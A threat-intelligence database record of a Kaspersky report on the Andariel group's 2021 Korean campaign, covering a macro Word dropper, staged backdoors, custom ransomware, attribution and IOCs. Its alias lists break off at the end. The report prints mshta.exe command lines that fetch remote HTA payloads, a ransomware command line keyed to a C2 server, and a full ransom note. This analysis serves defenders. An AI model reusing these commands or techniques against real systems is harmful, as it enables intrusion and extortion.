{
	"id": "9615e54c-f503-4253-b39a-e2202d2df50d",
	"created_at": "2026-04-06T00:14:54.765475Z",
	"updated_at": "2026-04-10T03:38:19.787093Z",
	"deleted_at": null,
	"sha1_hash": "f35c94bced01b50ed62c883f0a09ff211a24fa02",
	"title": "Andariel evolves to target South Korea with ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3353595,
	"plain_text": "Andariel evolves to target South Korea with ransomware\r\nBy Seongsu Park\r\nPublished: 2021-06-15 · Archived: 2026-04-05 13:28:28 UTC\r\nExecutive summary\r\nIn April 2021, we observed a suspicious Word document with a Korean file name and decoy. It revealed a novel infection\r\nscheme and an unfamiliar payload. While we were doing our research into these findings, Malwarebytes published a nice\r\nreport with technical details about the same series of attacks, which they attributed to the Lazarus group. After a deep\r\nanalysis, we came to a more precise conclusion: the Andariel group was behind these attacks. Andariel was designated by\r\nthe Korean Financial Security Institute as a sub-group of Lazarus.\r\nOur attribution is based on the code overlaps between the second stage payload in this campaign and previous malware from\r\nthe Andariel group. Apart from the code similarity, we found an additional connection with the Andariel group. Each threat\r\nactor has characteristics when they interactively work with a backdoor shell in the post-exploitation phase. The way\r\nWindows commands and their options were used in this campaign is almost identical to previous Andariel activity.\r\nThe threat actor has been spreading the third stage payload from the middle of 2020 onwards and leveraged malicious Word\r\ndocuments and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we\r\ndiscovered one victim getting infected with custom ransomware. It adds another facet to this Andariel campaign, which also\r\nsought financial profit in a previous operation involving the compromise of ATMs.\r\nFor more information please contact: intelreports@kaspersky.com\r\nBackground\r\nThis research started off with us discovering a suspicious Word document on VirusTotal. It contains an unfamiliar macro and\r\nuses novel techniques to implant the next payload. 
We discovered two infection methods used in these attacks in our\r\ntelemetry, where each payload has its own loader for execution in memory. The threat actor only delivered the final stage\r\npayload for selected victims.\r\nInfection procedure\r\nInitial infection or spreading\r\nAs pointed out in Malwarebytes’s public report, the actor sent weaponized documents to the victim as an initial infection\r\nvector. The documents use sophisticated infection methods to try to impede detection.\r\nhttps://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/\r\nPage 1 of 12\n\nMD5: ed9aa858ba2c4671ca373496a4dd05d4\r\nFile name: 참가신청서양식.doc (Form of participation application.doc)\r\nModified time: 2021-04-13 19:39:00\r\nAuthor: William\r\nLast saved user: William\r\nThe initial infection can be summarized like this:\r\n1. The user opens the malicious document and subsequently allows the macro to be executed;\r\n2. A popup message box appears;\r\n3. The current document gets saved to the path %temp% as HTML and accordingly stores all image files separately within the same directory;\r\n4. Show decoy document;\r\n5. Convert %temp%[document name]\\image003.png to the BMP file format and add the extension .zip;\r\n6. Execute image003.zip, which actually contains HTML Application (HTA) code, with mshta.exe;\r\n7. Remove previously created, temporary files.\r\nThe executed image003.zip is an HTML Application (HTA) file containing the second stage payload. This HTA code\r\ncreates the next payload at the hardcoded path C:/Users/Public/Downloads/Winvoke.exe.\r\nBesides the Microsoft Word document, the actor used an additional, alternative infection method according to our telemetry.\r\nAlthough we weren’t able to acquire the initial file, we assume the actor delivered a file disguised as a PDF, since we\r\ndiscovered artefacts containing the path of the tool ezPDFReader: c:\\program files (x86)\\unidocs\\ezpdfreader2.0g\\ezpdfwslauncher.exe. This software is developed by a South Korean software company\r\nnamed Unidocs. At this point, we’re missing clear evidence of whether the attack leveraged a vulnerability within this\r\nsoftware in the infection process or it was used to deceive users by opening a PDF document as a decoy while the HTA\r\npayload is fetched from a remote resource.\r\nNotably, the compromised website www.allamwith[.]com was used for a long period of time. We first saw the URL\r\nappearing in the context of this threat actor in September 2020 and it was still in use when we were researching this series of\r\nattacks at the end of April 2021.\r\n\"C:\\Program Files (x86)\\Unidocs\\ezPDFReader2.0G\\..\\..\\..\\Windows\\System32\\mshta.exe\" \"hxxp://www.jinjinpig.co[.]kr/AnyCss/skin.html\" /print\r\n\"C:\\Program Files (x86)\\Unidocs\\ezPDFReader2.0G\\..\\..\\..\\Windows\\System32\\mshta.exe\" \"hxxp://adame.ypelec.co[.]kr/customize/ypelec/images/skin.html\" /print\r\n\"C:\\Program Files (x86)\\Unidocs\\ezPDFReader2.0G\\..\\..\\..\\Windows\\System32\\mshta.exe\" \"hxxp://www.allamwith[.]com/home/css/skin.html\" /print\r\n\"C:\\Program Files\\Unidocs\\ezPDFReader2.0G\\..\\..\\..\\Windows\\System32\\mshta.exe\" \"hxxp://www.conkorea[.]com/cshop/skin/skin.html\" /print\r\nWhen we analyzed the above malicious URLs, many of the resources had already gone offline, but the attacker 
is still using\r\none distribution URL: hxxp://www.allamwith[.]com/home/css/skin.html\r\nThe URL hosts still serving the HTML Application (HTA) file exhibit similar functions as the HTA file created by the\r\nmalicious Word document. However, in the case of remotely fetched HTA code with PDF-style attacks, the next payload\r\ngets dropped to a different hardcoded path, located at C:/users/public/iexplore.exe, and eventually executed.\r\nComparison of two HTA files\r\nSecond stage payload: Simple agent\r\nThe second stage payload is responsible for communicating with the C2 server and preparing another payload for the next\r\nstage. This second stage malware decrypts the embedded payload at runtime. It uses an embedded 16-byte XOR key to\r\ndecrypt the base64 encoded payload. The decrypted payload is another portable executable file that runs in memory.\r\nXOR key and encrypted payload\r\nThe infection procedure of the second stage payload:\r\n1. Create mutex named Microsoft32.\r\n2. Resolve API address: base64 decoding + RC4 decryption with the key MicrosoftCorporationValidation@#$%^\u0026*()!US\r\n3. Retrieve C2 addresses: base64 decoding + custom XOR decryption.\r\n4. Communication with C2.\r\nAccording to the response from the C2 server, the payload is able to perform five actions:\r\nIdentifier | Description | Response message to C2\r\n1111 | Set Sleep() interval | 1111%d Success!\r\n1234 | Execute received data using CreateThread() | 1234 Success!\r\n8877 | Save received data in a local file | 8877 Success!\r\n8888 | Execute given commands with WinExec API | 8888 Success!\r\n9999 | Execute given commands with cmd.exe | Send command result\r\nThe malware operator appears to deliver the third stage payload by using the above functionalities, as our telemetry reveals.\r\nBoth second and third stage payloads also share an identical icon, which looks like Internet Explorer.\r\nSame icon for second stage payload and third stage payload\r\nThird stage payload: Backdoor\r\nThe third stage payload was created via the second stage payload, is interactively executed in the operation and exists in\r\nboth x64 and x86 versions. Most of them use Internet Explorer or Google Chrome icons and corresponding file names to\r\ndisguise themselves as legitimate internet browsers. The third stage decrypts the embedded payload and executes it. The\r\nembedded payload shows the same structure as the second stage payload discussed above.\r\nXOR key and encrypted payload\r\nOnce launched, it checks for the mutex QD33qhhXKK and inspects the system for signs of a sandbox environment by\r\nsearching for the presence of specific modules. The strings of module names to be checked are decoded with a hardcoded\r\nXOR key: 0x4B762A554559586F6A45656545654130\r\nsbiedll.dll: Sandboxie module\r\napi_log.dll: SunBelt SandBox module\r\ndir_watch.dll: SunBelt SandBox module\r\nWith the environment checks done, the main payload gets decrypted using the same XOR key and launched with\r\nrundll32.exe. 
Three C2 addresses then get extracted and decrypted using DES, with all addresses pointing to the same IP\r\n(23.229.111[.]197) in this sample. The malware then sends a hardcoded string to the C2 server: “HTTP 1.1 /member.php SSL3.4”.\r\nC2 communication\r\nNext, it checks if the C2’s response data equals “HTTP 1.1 200 OK SSL2.1” and, if positive, starts conducting its backdoor\r\noperations. The samples contain debug data and thereby expose function names disclosing their purpose:\r\nModuleUpdate: Replace the current module with a batch file\r\nModuleShell: Execute Windows command, changes working directory, Connect to given IP address\r\nModuleFileManager: Get disk information, File listing, File manipulation\r\nModuleScreenCapture: Take a screenshot\r\nRansomware\r\nInterestingly, one victim was discovered to have received ransomware after the third stage payload. This ransomware sample\r\nis custom made and specifically developed by the threat actor behind this attack. This ransomware is controlled by command\r\nline parameters and can either retrieve an encryption key from the C2 or, alternatively, take it as an argument at launch time.\r\nParameters | Description\r\n#1 | Drive path to encrypt\r\n#2 | Malware takes two types of options: -s and -S option: specify a C2 IP address and port to source an encryption key; -k and -K option: specify 32-byte initial vector (IV) and 32-byte key from command line parameters\r\n#3 | Depending on parameter #2: -s/-S: C2 IP address; -k/-K: 32-byte initial vector (IV) value\r\n#4 | Depending on parameter #2: -s/-S: C2 port number; -k/-K: 32-byte encryption key value\r\n#5 | Attacker contact: email address\r\n#6 | File extension to be used for encrypted files/file name of ransom note\r\n#7 | Optional parameter: 24-character victim ID\r\nWe saw the malware executed with the following parameter options in our telemetry, with some parameters illustrated\r\nbelow:\r\nc:\\temp\\mshelp.exe  d:\\ -s 23.229.111[.]197 3569 sanjgold847@protonmail[.]com 12345 12345FDDEE5566778899AABB\r\nUpon launch, the ransomware checks the number of parameters. If the number of arguments is less than six, the malware\r\nterminates itself. If there is no extension for the encrypted files specified, the malware uses a default extension (.3nc004) and\r\na default file name for the ransom note (3nc004.txt). If the victim ID is left unspecified, the ransomware generates a random\r\nID 24 characters long.\r\nIf the malware is executed with the -s(-S) option, it sends the victim ID to the C2 server and receives the initial vector (IV)\r\nand key to encrypt files. Each of the strings has a length of 32 characters. 
When the ransomware communicates with the C2\r\nserver, it uses the same authentication process and strings as the third stage payload.\r\nStrings for C2 authentication\r\nThe ransomware uses an AES-128 CBC mode algorithm to encrypt files on the victim machine. With the exception of\r\nsystem-critical files (“.exe”, “.dll”, “.sys”, “.msiins”, and “.drv” extensions), the malware encrypts files completely,\r\nirrespective of file size. However, since important system configuration files are affected by the encryption procedure as\r\nwell, it can lead to an unstable system.\r\nAs a final step, it leaves a ransom note on the desktop and in the startup folder and opens it with notepad.exe.\r\nAttention! Attention! Attention!\r\nYour documents, photos, databases and other important files are encrypted and have the extension : [extension]\r\nDon't worry, you can return all your files!\r\nIf you want to decrypt all your encrypted files, the only method of recovering files is to purchase decrypt tool and\r\nunique key for you.\r\nYou just need little bitcoin.\r\nThis software will decrypt all your encrypted files.\r\nTo get this software you need write on our e - mail : [Attacker's email address]\r\nWhat gurantees do we give to you?\r\nIt's just a business. We absolutely do not care about you and your deals, except getting benefits.\r\nYou can send 2 your encrypted file from your PC with your ID and decrypt it for free.\r\n+ -- - Warning-- - +\r\nDon't try to change files by yourself, Don't use any third party software for restoring your data.\r\nYou ID : [24 characters victim ID]\r\nVictims\r\nHistorically, the Andariel group has mainly targeted entities in South Korea, which, according to our telemetry, is also the\r\ncase in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction\r\nsectors. Each victim is active in their respective industries and they do not appear to be connected. Therefore, it is not\r\ncurrently possible to determine a precise focus with regard to victimology.\r\nIn one instance we discovered that the threat actor delivered ransomware to a victim. This adds a financially motivated angle\r\nto these attacks. The Andariel group has already been observed directly monetizing an operation in a previous case where\r\nATMs were compromised in South Korea.\r\nTargeted industries in South Korea\r\nAttribution\r\nThe Malwarebytes report attributes this attack to the Lazarus group, but based on the custom string decryption routine seen\r\nin the second stage payload we came to a different conclusion. This XOR-based decryption routine has been used by\r\nAndariel malware for a long time. For instance, this decryption routine has also been used in malware (MD5\r\n9758efcf96343d0ef83854860195c4b4) we reported earlier to our Threat Intelligence Portal customers on Andariel’s 2019\r\nactivity. 
In addition, malware (MD5 3703c22e33629abd440483e0f60abf79) dropped by a malicious Word document in early\r\n2018 – also attributed to Andariel – exhibits the same decryption routine.\r\nCode overlap with previous Andariel malware\r\nAn additional indicator pointing to the Andariel group can be discovered in the post-exploitation commands on victim\r\nmachines. As a rule, each APT actor displays a different command line signature when working interactively via an installed\r\nbackdoor. As a result of comparing previously seen Windows commands delivered by the Andariel group, we can confirm\r\nthat both cases used the same Windows command options.\r\nWhen checking network connections with the “netstat” command, both cases use the “-naop” option in conjunction with the “tcp” argument.\r\nFiltering the result, both cases use the “findstr” command instead of “find”.\r\nThe Lazarus group has been observed using Windows commands that differ from Andariel, such as preferring the “-ano”\r\noption with the “netstat” command and “find” as a filter command, rather than “findstr”.\r\nCommands used by Andariel group in previous cases:\r\nnetstat -naop tcp\r\nnetstat -naop tcp | findstr 2008\r\ntasklist | findstr sqlwriter.exe\r\ntasklist | findstr juchmon.exe\r\nCommands seen in the attacks discussed in this report:\r\nnetstat -naop tcp | findstr LISTEN\r\ntasklist | findstr 3756\r\ntasklist | findstr 15412\r\nCommands used by Lazarus group:\r\nnetstat -ano | find “:445”\r\nnetstat -ano | find “EST”\r\nHowever, apart from the connections to the Andariel group, we discovered two weaker ties to the Lazarus group in the third\r\nstage payload. It shows an overlap with the PEBBLEDASH malware family, previously published by CISA. CISA attributed\r\nthis malware variant to a threat actor they dubbed Hidden Cobra. We called this malware variant Manuscrypt and attributed\r\nit to the Lazarus group.\r\nOne overlap is a batch script used in both instances in order to remove itself:\r\nIdentical batch script\r\nBoth malware types enumerate local drives and partitions in the process, where both instances use the string “CD Drive” when the current drive type is “DRIVE_CDROM”.\r\nSame drive checking result\r\nIn conclusion, we assess that the Andariel group is behind this attack. However, it also reveals a faint connection to the\r\nLazarus group.\r\nConclusions\r\nThe Andariel group has continued to focus on targets in South Korea, but their tools and techniques have evolved\r\nconsiderably. By closely examining the whole infection procedure, we discovered that the Andariel group intended to spread\r\nransomware through this attack and, by doing so, they have underlined their place as a financially motivated state-sponsored\r\nactor.\r\nIndicators of compromise\r\nMalicious documents\r\ned9aa858ba2c4671ca373496a4dd05d4    참가신청서양식.doc (Application form.doc)\r\n71759cca8c700646b4976b19b9abd6fe    생활비지급.doc (Payment of living costs.doc)\r\n3ba4c71c6b087e6d06d668bb22a5b59a    test3.doc\r\nd5e974a3386fc99d2932756ca165a451    결의대회초안.doc (Draft for resolution conference.doc)\r\nSecond stage payload (Simple agent)\r\nf4d46629ca15313b94992f3798718df7    %PUBLIC%\\downloads\\winvoke.exe\r\n118cfa75e386ed45bec297f8865de671    %PUBLIC%\\Libraries\\AppStore.exe\r\n53648bf8f0121130edb42c626d7c2fc4\r\n1bb267c96ec2925f6ae3716d831671cf    %PUBLIC%\\Libraries\\AlgStore.exe\r\n0812ce08a75e5fc774a114436e88cd06\r\n927f0a1090255bc724953e1f5a09a070    %PUBLIC%\\iexplore.exe\r\n145735911e9c8bafa4c9c1d7397199fc    iexplore.exe\r\n551c5b3595e9fc1081b5e1f10e3c1a59    iexplore.exe\r\nf3fcb306cb93489f999e00a7ef63536b\r\n0ecfa51cd4bf1a9841a07bdb5bfcd0ab\r\n4d30612a928faf7643b14bd85d8433cc\r\ndf1e7a42c92ecb01290d896dca4e5faa\r\nThird stage payload (Backdoor)\r\n3b1b8702c4d3e2e194c4cc8f09a57d06    %PUBLIC%\\chrome.exe\r\nef3a6978c7d454f9f6316f2d267f108d\r\n33c2e887c3d337eeffbbd8745bfdfc8f\r\nbf4a822f04193b953689e277a9e1f4f1\r\n6e710f6f02fdde1e4adf06935a296fd8\r\n38917e8aa02b58b09401383115ab549e\r\n67220baf2a415876bee2d43c11f6e9ad\r\n3bf9b83e00544ac383aaef795e3ded78    ixplore.exe\r\n159ad2afcab80e83397388e495d215a5\r\n21ec5f03aab696f0a239c6ea5e50c014    %PUBLIC%\\iexplore.exe\r\nb5874eb1119327be51ae03adcbf4d3e0    %USERPROFILE%\\iexplore.exe\r\n8b378eabcec13c3c925cc7ca4d191f5f\r\n5b387a9130e9b9782ca4c225c8e641b3\r\n25c8e057864126e6648c34581e7b4f20\r\n62eae43a36cbc4ed935d8df007f5650b\r\n8d74112c97e98fef4c5d77200f34e4f2\r\nb5648f5e115da778615dfd0dc772b647    %USERPROFILE%\\iexplore.exe\r\neef723ff0b5c0b10d391955250f781b3\r\nd1a99087fa3793fbc4d0adb26e87efce\r\nd63bb2c5cd4cfbe8fabf1640b569db6a\r\nfffad123bd6df76f94ffc9b384a067fc\r\nabaeecd83a585ec0c5f1153199938e83\r\n569246a3325effa11cb8ff362428ab2c\r\n3b494133f1a673b2b04df4f4f996a25d\r\nfc3c31bbdbeee99aba5f7a735fac7a7e\r\nRansomware\r\nd96fcd2159643684f4573238f530d03b    %TEMP%\\mshelp.exe\r\nSecond stage C2 servers\r\nhxxp://ddjm[.]co[.]kr/bbs/icon/skin/skin[.]php\r\nhxxp://hivekorea[.]com/jdboard/member/list[.]php\r\nhxxp://mail[.]namusoft[.]kr/jsp/user/eam/board[.]jsp\r\nhxxp://mail[.]sisnet[.]co[.]kr/jsp/user/sms/sms_recv[.]jsp\r\nhxxp://snum[.]or[.]kr/skin_img/skin[.]php\r\nhxxp://www[.]allamwith[.]com/home/mobile/list[.]php\r\nhxxp://www[.]conkorea[.]com/cshop/banner/list[.]php\r\nhxxp://www[.]ddjm[.]co[.]kr/bbs/icon/skin/skin[.]php\r\nhxxp://www[.]jinjinpig[.]co[.]kr/Anyboard/skin/board[.]php\r\nThird stage C2 servers\r\n198.55.119.112:443\r\n45.58.112.77:443\r\n23.229.111.197:8443\r\n23.229.111.197:443\r\n185.208.158.208:443\r\nMITRE ATT\u0026CK Mapping\r\nTactic | Technique | Technique Name\r\nResource Development | T1584.006 | Compromise Infrastructure: Web Services\r\nResource Development | T1583.003 | Acquire Infrastructure: Virtual Private Server\r\nInitial Access | T1566.001 | Phishing: Spearphishing Attachment\r\nExecution | T1204.002 | User Execution: Malicious File\r\nExecution | T1059.007 | Command and Scripting Interpreter: JavaScript\r\nDefense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location\r\nDefense Evasion | T1027.003 | Obfuscated Files or Information: Steganography\r\nDefense Evasion | T1497.001 | Virtualization/Sandbox Evasion: System Checks\r\nDiscovery | T1049 | System Network Connections Discovery\r\nDiscovery | T1057 | Process Discovery\r\nCollection | T1113 | Screen Capture\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols\r\nCommand and Control | T1095 | Non-Application Layer Protocol\r\nCommand and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography\r\nExfiltration | T1041 | Exfiltration Over C2 Channel\r\nImpact | T1486 | Data Encrypted for Impact\r\nSource: https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/"
	],
	"report_names": [
		"102811"
	],
	"threat_actors": [
		{
			"id": "838f6ced-12a4-4893-991a-36d231d96efd",
			"created_at": "2022-10-25T15:50:23.347455Z",
			"updated_at": "2026-04-10T02:00:05.295717Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"Andariel",
				"Silent Chollima",
				"PLUTONIUM",
				"Onyx Sleet"
			],
			"source_name": "MITRE:Andariel",
			"tools": [
				"Rifdoor",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "110e7160-a8cc-4a66-8550-f19f7d418117",
			"created_at": "2023-01-06T13:46:38.427592Z",
			"updated_at": "2026-04-10T02:00:02.969896Z",
			"deleted_at": null,
			"main_name": "Silent Chollima",
			"aliases": [
				"Onyx Sleet",
				"PLUTONIUM",
				"OperationTroy",
				"Guardian of Peace",
				"GOP",
				"WHOis Team",
				"Andariel",
				"Subgroup: Andariel"
			],
			"source_name": "MISPGALAXY:Silent Chollima",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc6e3644-3249-44f3-a277-354b7966dd1b",
			"created_at": "2022-10-25T16:07:23.760559Z",
			"updated_at": "2026-04-10T02:00:04.741239Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"APT 45",
				"Andariel",
				"G0138",
				"Jumpy Pisces",
				"Onyx Sleet",
				"Operation BLACKMINE",
				"Operation BLACKSHEEP/Phase 3.",
				"Operation Blacksmith",
				"Operation DESERTWOLF/Phase 3",
				"Operation GHOSTRAT",
				"Operation GoldenAxe",
				"Operation INITROY/Phase 1",
				"Operation INITROY/Phase 2",
				"Operation Mayday",
				"Operation VANXATM",
				"Operation XEDA",
				"Plutonium",
				"Silent Chollima",
				"Stonefly"
			],
			"source_name": "ETDA:Andariel",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "771d9263-076e-4b6e-bd58-92b6555eb739",
			"created_at": "2025-08-07T02:03:25.092436Z",
			"updated_at": "2026-04-10T02:00:03.758541Z",
			"deleted_at": null,
			"main_name": "NICKEL HYATT",
			"aliases": [
				"APT45 ",
				"Andariel",
				"Dark Seoul",
				"Jumpy Pisces ",
				"Onyx Sleet ",
				"RIFLE Campaign",
				"Silent Chollima ",
				"Stonefly ",
				"UN614 "
			],
			"source_name": "Secureworks:NICKEL HYATT",
			"tools": [
				"ActiveX 0-day",
				"DTrack",
				"HazyLoad",
				"HotCriossant",
				"Rifle",
				"UnitBot",
				"Valefor"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
